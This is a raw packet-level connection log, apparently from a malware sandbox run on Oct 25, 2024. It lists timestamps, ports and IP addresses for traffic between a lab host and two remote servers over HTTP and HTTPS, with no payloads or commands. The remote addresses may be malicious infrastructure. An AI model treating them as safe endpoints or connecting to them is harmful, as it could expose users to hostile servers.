Oct 25, 2024 19:50:46.730130911 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730151892 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730166912 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730166912 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730176926 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730192900 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730233908 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730252028 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730266094 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730269909 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730294943 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730300903 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730312109 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730319023 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730333090 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730344057 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730457067 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730493069 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730499029 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730515957 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730529070 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730544090 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730545044 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730561972 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730573893 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730580091 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730618954 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730618954 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730635881 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730654001 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730667114 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730670929 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730680943 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730690002 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730695009 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730721951 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.731472015 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.731489897 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.731508017 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.731513977 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.731525898 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.731525898 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.731538057 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.731544971 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.731553078 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.731563091 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.731575966 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.731591940 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.731594086 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.731628895 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.731703997 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.731736898 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.731743097 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.731770992 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.731770992 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.731806040 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.732336998 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.732371092 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.732376099 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.732403994 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.732404947 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.732436895 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.732439995 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.732476950 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.946739912 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.946850061 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:47.225632906 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:47.225670099 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:47.231502056 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:47.231528997 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:47.231574059 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:47.253046989 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:47.253060102 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:47.878426075 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:47.878504992 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:47.885828972 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:47.885862112 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:47.886156082 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:47.886214972 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:47.972860098 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:48.019331932 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:48.386373043 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:48.386532068 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:48.387960911 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:48.388031006 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:48.388039112 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:48.388086081 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:48.389148951 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:48.389183998 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:48.398277044 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:48.403856993 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:48.403934002 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:48.404042959 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:48.409704924 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:49.146286011 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:49.146310091 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:49.146334887 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:49.146351099 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:49.146364927 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:49.146373034 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:49.146373034 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:49.146378994 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:49.146394968 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:49.146400928 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:49.146409035 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:49.146428108 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:50.138230085 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:50.138358116 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:50.138545036 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:50.138590097 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.315826893 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.315850973 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.315867901 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.315882921 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.315900087 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.315915108 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.315948963 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.315948963 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.316447020 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.316463947 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.316489935 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.316500902 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.316504955 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.316521883 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.316535950 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.316555977 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.745930910 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.745949984 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.745965004 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.746022940 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.746032000 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.746059895 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.746059895 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.887006998 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.887052059 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.887088060 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.887124062 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.887121916 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.887121916 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.887197018 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.887197018 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.957263947 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.957282066 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.957304955 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.957319975 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.957335949 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.957374096 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.957389116 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.957389116 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.957781076 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.957818985 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.957953930 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.957993984 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:52.958029032 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:52.958060980 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.004965067 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.004983902 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.005000114 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.005043030 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.005101919 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.005116940 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.005122900 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.005132914 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.005132914 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.005143881 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.005145073 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.005162001 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.005162001 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.005176067 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.005177975 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.005193949 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.005204916 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.520936012 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.520960093 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.520982981 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.520998955 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.521023035 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.521075010 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.521101952 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.521135092 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.521178007 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.521945953 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.521961927 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.521977901 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.521992922 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.521996975 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.522006035 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.522011042 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.522027969 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.522039890 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.553145885 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.553165913 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.553183079 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.553200006 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.553271055 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.553354979 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.553397894 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.553428888 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.553464890 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.553631067 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.553653955 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.553670883 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.553685904 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.553848982 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.553848982 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.553848982 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.622381926 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.622406006 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.622423887 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.622441053 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.622632027 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.622632027 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.622769117 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.622819901 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.622883081 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.622910023 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.622937918 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.622966051 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.623342037 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.623358965 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.623375893 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.623406887 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.623408079 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.623459101 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.623599052 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.623656988 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.623675108 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.623730898 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.693541050 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.693564892 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.693583965 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.693695068 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:53.693780899 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.693780899 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:53.693878889 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.077677965 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.077718019 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.077750921 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.077785969 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.077821970 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.077842951 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.077842951 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.077872038 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.077918053 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.077933073 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.078320026 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.078352928 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.078381062 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.078386068 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.078402996 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.078427076 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.078747988 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.078764915 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.078789949 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.078815937 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.078815937 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.078875065 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.147994995 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.148062944 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.148072004 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.148122072 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.528681993 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.528698921 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.528841019 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.669841051 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.669910908 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.669962883 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.669970036 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.670000076 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.670031071 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.670032024 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.670034885 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.670061111 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.670078993 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.670347929 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.670382023 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.670406103 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.670416117 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.670427084 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.670458078 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.741545916 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.741748095 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:54.742360115 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:54.742412090 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:55.124433994 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:55.124474049 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:55.124509096 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:55.124541044 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:55.124574900 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:55.124603987 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:55.124603987 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:55.124756098 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:55.496879101 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:55.496910095 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:55.496927023 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:55.496985912 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:55.497005939 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:55.873518944 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:55.873625040 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:55.873630047 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:55.873667002 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.015688896 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.015724897 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.015743017 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.015782118 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.015789986 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.015789986 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.015800953 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.015810013 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.016134977 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.016153097 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.016159058 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.016169071 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.016175032 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.016194105 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.016207933 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.016814947 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.016864061 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.086688995 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.086708069 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.086765051 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.467376947 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.467396021 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.467425108 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.467447042 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.609481096 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.609513998 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.609529018 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.609589100 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.609606028 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:56.609662056 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:56.609695911 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.591398001 CEST	80	49166	192.3.176.141	192.168.2.22
